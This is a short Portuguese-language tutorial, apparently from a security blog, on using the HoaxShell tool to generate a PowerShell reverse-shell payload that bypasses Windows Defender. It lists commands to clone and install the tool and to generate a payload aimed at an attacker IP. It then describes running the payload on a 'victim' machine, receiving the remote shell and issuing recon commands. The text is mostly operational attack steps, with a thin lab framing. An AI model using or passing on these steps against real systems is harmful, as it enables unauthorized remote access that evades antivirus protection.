HoaxShell é uma ferramenta desenvolvida em Python que gera payloads capaz de realizar o bypass no Windows Defender e em outros Antivírus conhecidos.
Realize o clone do projeto hoaxshell e liste o conteúdo do diretório.
Linuxgit clone https://github.com/t3l3machus/hoaxshell cd hoaxshell/ ls -l
Realize a instalação das dependências :
Linuxpip3 install -r requirements.txt
Para gerar o payload basta executar o script seguido do IP do Atacante :
Linuxpython3 hoaxshell.py -s 192.168.0.53
Copie o payload gerado em PowerShell :
Certifique-se que o Windows Defender esteja com todas as proteções habilitadas :
Execute o payload na máquina da Vítima.
Observe que a conexão reversa é estabelecida com sucesso!
LinuxPS C:\Users\100security>
Digite os comandos :
Linuxhostname ipconfig
Para confirmar se o Windows Defender está habilitado digite :
PowerShellGet-MpComputerStatus | Select-Object -Property Antivirusenabled,AMServiceEnabled,AntispywareEnabled,BehaviorMonitorEnabled,IoavProtectionEnabled,NISEnabled,OnAccessProtectionEnabled,RealTimeProtectionEnabled,AntivirusSignatureLastUpdated